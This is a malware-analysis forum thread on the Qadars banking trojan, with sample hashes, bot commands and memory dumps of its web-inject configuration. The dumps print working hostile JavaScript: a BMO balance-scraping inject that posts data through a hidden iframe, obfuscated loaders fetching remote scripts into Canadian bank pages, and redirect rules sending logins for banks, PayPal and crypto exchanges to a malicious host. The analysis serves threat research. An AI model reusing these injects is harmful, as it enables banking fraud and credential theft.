A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21769  by rkhunter
 Sun Dec 22, 2013 5:49 pm
http://www.welivesecurity.com/2013/12/1 ... ts-sights/

Win32/Qadars (Nuclear Pack)
MD5: a1575979eccf5a820c5d6a2e0b8ba45b
SHA1: f31bf806920c97d9ca8418c9893052754df2eb4d
SHA256: ca3ea64b5a26f7eae7b48c93e0899552ef68b60dd7567b185364e1a73fe53057

Win32/Qadars (1.0.2.3)
MD5: 8cee78fcd2d5f98914ce38d2035a3d02
SHA1: dac7065529e59ae6fc366e23c470435b0fa6ebbe
SHA256: 04f0feb7ab6b68dabbebc3da2082afabacbe488bca3464f3da985a9b4d9c7c2c

Android/Perkele
MD5: 8db2b5a3268b08c9f5c8e031024041d4
SHA1: b2c70ca7112d3fd3e0a88d2d38647318e68f836f
SHA256: a9ee4bb7877f75552176c4a9de4ab916bbd0ddebc22604be2cb07674f6939119
You do not have the required permissions to view the files attached to this post.
 #22857  by forty-six
 Mon May 12, 2014 9:33 pm
Has VM check 0043AFA2.
Code: Select all
000453C8  00001010
000453D4  00001011
000453E0  00001004
000453EC  0000
000453F4  00001007
00045400  0000
00045408  00001008
00045414  0000
0004541C  00001009
00045428  0000
00045430  0000
00045438  00001001
00045444  0000
0004544C  00001003
00045458  0000
00045460  00001006
0004546C  0000
00045474  00001012
00045480  0000
00045490  00001002
Looks like a couple commands missing from ESET list....
You do not have the required permissions to view the files attached to this post.
 #26014  by Kafeine
 Sat Jun 06, 2015 7:55 pm
After striking exclusively in France, then exclusively in Netherlands...it seems (based on the Distribution) that Qadars is now looking at Canada since few days.

Could anyone confirm this, by extracting the injects ?

Attached is a fresh (dropped by Angler) sample.
563379a48d876f6c35317bb7551efeb55754123056109ab030d1e796ae1b9c2c
You do not have the required permissions to view the files attached to this post.
Last edited by Kafeine on Sat Jun 06, 2015 7:56 pm, edited 2 times in total.
 #26015  by robemtnez
 Sun Jun 07, 2015 3:43 am
It gets the web injects from freechristmasgifts2014.com which was active on August last year as per http://cybercrime-tracker.net/index.php ... ts2014.com

TD: https://freechristmasgifts2014.com/tdadmin/td.js
RBC: https://freechristmasgifts2014.com/rbcadmin/rbc.js
BMO: https://freechristmasgifts2014.com/bmoadmin/bmo.js
CIBC: https://freechristmasgifts2014.com/cibcadmin/cibc.js
Scotiabank: https://freechristmasgifts2014.com/scot ... /scotia.js

From a memory dump of svchost.exe:
Code: Select all
0x199310 (15): ndwInjectsCount
0x199320 (10): ilpInjects
0x199336 (39): http*bmo.com/onlinebanking/OLB*gdwFlags
0x19935e (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty	
0x19938a (2477): <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>

function IsOnBalanceStage(){
  var case1 = $("a.selected:contains('My Accounts')").length > 0;
  var case2 = $("th.accountType:contains('Account Type')").length > 0;
  var case3 = $("th.accountNumber:contains('Account #')").length > 0;
  var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
  var case5 = $("th.totals:contains('Totals')").length > 0;
  return case1 && case2 && case3 && case4 && case5;
}

function DoGrabBalances() {
  var balances = new Array();
  $("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
    var accountBalance = {};
    accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
    accountBalance.accountNumber = $(this).children().slice(1,2).text();
    accountBalance.date = $(this).children().slice(2,3).text();
    accountBalance.balance = $(this).children().slice(3,4).text();
    balances.push(accountBalance);
  });
  return balances;
}

function iframeform(url)
{
    var object = this;
    object.time = new Date().getTime();
    var iframe = $('<iframe style="display:none;"></iframe>');
    $("body").append(iframe); 
    iframe.attr({'id': 'iframe'+object.time});
    iframe.attr({'name': 'iframe'+object.time});
    object.form = $("<form></form>");
    $("body").append(object.form);
    object.form.attr({'target': 'iframe'+object.time});
    object.form.attr({'method': 'post'});
    object.form.attr({'action': url});
    object.addParameter = function(parameter,value)
    {
        $("<input type='hidden' />")
         .attr("name", parameter)
         .attr("value", value)
         .appendTo(object.form);
    };
    object.send = function()
    {
        object.form.submit();
    };
}

function DoSendBalances(balances) {
  var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
  poster.addParameter("clsid", "balls");
  for (key in balances) {
    if (balances.hasOwnProperty(key) && /^0$|^[1-9]\d*$/.test(key) && key <= 4294967294) {
      poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
    }
  }
 poster.send();
}
 
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
  DoSendBalances(DoGrabBalances());
}
});

</script>
0x199d38 (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199d6f (12): jlpszBeforex
0x199d7c (39): function eStatementDialog(){ilpszAfterx
0x199da4 (38): function linkMyAccount(){jlpszInjecta}
0x199dcb (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199e02 (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjectx
0x199e2d (141): <script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
0x199ebb (62): glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
0x199efa (129): jlpszBeforeg<head*>ilpszAfter`jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
0x199f7c (67): glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
0x199fc0 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty

0x199fec (2741): <script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19aaac (37): https://*.royalbank.com/*/*/*gdwFlags
0x19aad2 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty

0x19aafe (2735): <script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19b5b8 (34): https://easyweb*.td*.com/*gdwFlags
0x19b5db (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19b607 (443): <script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount
 #26047  by sysopfb
 Tue Jun 09, 2015 10:57 pm
C:\Soft\qadars\Release\modules\moduleMain_32.pdb
bot_upload_exe
bot_update_exe
bot_update
os_reboot

Code: Select all
n*verisign.com*n*digicert.com*l*thawte.com*x!*safebrowsing.clients.google.com*x
*gtssl-ocsp.geotrust.com*u*clients1.google.com*n*gb.symcd.com*t*ocsp-responder.com*p*globalsign.com*r*data.mozilla.com*s*ocsp.omniroot.com*x
*safebrowsing.google.com*x
*urs.microsoft.com/urs.asmx*x
*tiles.services.mozilla.com*w*telemetry.mozilla.org*t*facebook.com/ajax/*x
*localhost:26143/skypectoc/*s*youtube.com/watch*r*youtube.com/api/*q*plus.google.com*q*news.google.com*x
*facebook.com/stickers/*m*savecdn.com*l*.lphbs.com*u*geo.query.yahoo.com*x
*pr.comet.yahoo.com/comet*x$*.mail.yahoo.com/ws/mail/v*/jsonrpc*x
*syndication.twitter.com/i/jot*x
*analytics.query.yahoo.com*qdwExceptionsCount
ilpHeaders
px-xss-protectionx
x-content-security-policyox-frame-optionsvx-content-type-optionslx-webkit-cspix-insightwcontent-security-policyndwHeadersCount
ndwInjectsCount
ilpInjects
glpszURLx
http*bmo.com/onlinebanking/OLB*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty	
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
function IsOnBalanceStage(){
  var case1 = $("a.selected:contains('My Accounts')").length > 0;
  var case2 = $("th.accountType:contains('Account Type')").length > 0;
  var case3 = $("th.accountNumber:contains('Account #')").length > 0;
  var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
  var case5 = $("th.totals:contains('Totals')").length > 0;
  return case1 && case2 && case3 && case4 && case5;
function DoGrabBalances() {
  var balances = new Array();
  $("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
    var accountBalance = {};
    accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
    accountBalance.accountNumber = $(this).children().slice(1,2).text();
    accountBalance.date = $(this).children().slice(2,3).text();
    accountBalance.balance = $(this).children().slice(3,4).text();
    balances.push(accountBalance);
  });
  return balances;
function iframeform(url)
    var object = this;
    object.time = new Date().getTime();
    var iframe = $('<iframe style="display:none;"></iframe>');
    $("body").append(iframe); 
    iframe.attr({'id': 'iframe'+object.time});
    iframe.attr({'name': 'iframe'+object.time});
    object.form = $("<form></form>");
    $("body").append(object.form);
    object.form.attr({'target': 'iframe'+object.time});
    object.form.attr({'method': 'post'});
    object.form.attr({'action': url});
    object.addParameter = function(parameter,value)
    {
        $("<input type='hidden' />")
         .attr("name", parameter)
         .attr("value", value)
         .appendTo(object.form);
    };
    object.send = function()
    {
        object.form.submit();
    };
function DoSendBalances(balances) {
  var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
  poster.addParameter("clsid", "balls");
  for (key in balances) {
    if (balances.hasOwnProperty(key) && /
[1-9]\d*$/.test(key) && key <= 4294967294) {
      poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
    }
 poster.send();
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
  DoSendBalances(DoGrabBalances());
</script>
glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
jlpszBeforex
function eStatementDialog(){ilpszAfterx
function linkMyAccount(){jlpszInjecta}
glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjectx
<script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
olean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
glpszURLx
https://*.royalbank.com/*/*/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
olean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
glpszURLx
https://easyweb*.td*.com/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount
)klpRedirects
glpszURLx&*accounts.google.com/ServiceLoginAuth*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx"*login.live.com/ppsecure/post.srf*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx&*facebook.com/login.php?login_attempt*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paypal.com/signin/intent*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paypal.com/*/cgi-bin/webscr*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx(*bwin.com/*/authentication/signon/index*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*btc-e.com/ajax/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*mtgox.com/code/login_bis.json*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*bitstamp.net/account/login/*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLt*bitcoin.de/*/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLt*cavirtex.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*login.yahoo.com/config/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*login.szn.cz/loginProcess*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*login.mail.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx6*webmail.kpnmail.nl/RedirectHandler.ashx?action=logon*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx *login.libero.it/logincheck.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx(*upcmail.upc.nl/ajax/login?action=login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*upcmail.net/do/dologin?v=upc*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx"*mail.ziggo.nl/appsuite/api/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*twitter.com/sessions*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLo*/wp-login.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLq*cap?RID=*&VAA=B*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*account.skrill.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLr*payweb.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLw*okpay.com/ru/account/*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx/*secure.pecunix.com/money.cfm?fact=validatePin*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paxum.com/payment/phrame.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*payeer.com/ajax/index.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx/*signin.ebay.com/ws/eBayISAPI.dll?co_partnerId*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLj*checkout*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLi*payment*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*secure.worldpay.com/wcc/card*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLl*processing*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLi*confirm*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLj*merchant*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLs*/prod/order_Agree*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx@*online.americanexpress.com/myca/logon/*/action/LogLogonHandler*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx1*bankofamerica.com/login/sign-in/entry/signOn.go*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*chase.com/auth/fcc/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx+*onlinebanking.usbank.com/Auth/Login/Login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*online.wellsfargo.com/signon*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
You do not have the required permissions to view the files attached to this post.
 #26314  by R136a1
 Sat Jul 18, 2015 1:45 pm
Hi,

attached are some Qadars samples (x86/x64). Internal version of x86 droppers is 2.0.0.0 while the version of x64 component is 1.0.0.0.
You do not have the required permissions to view the files attached to this post.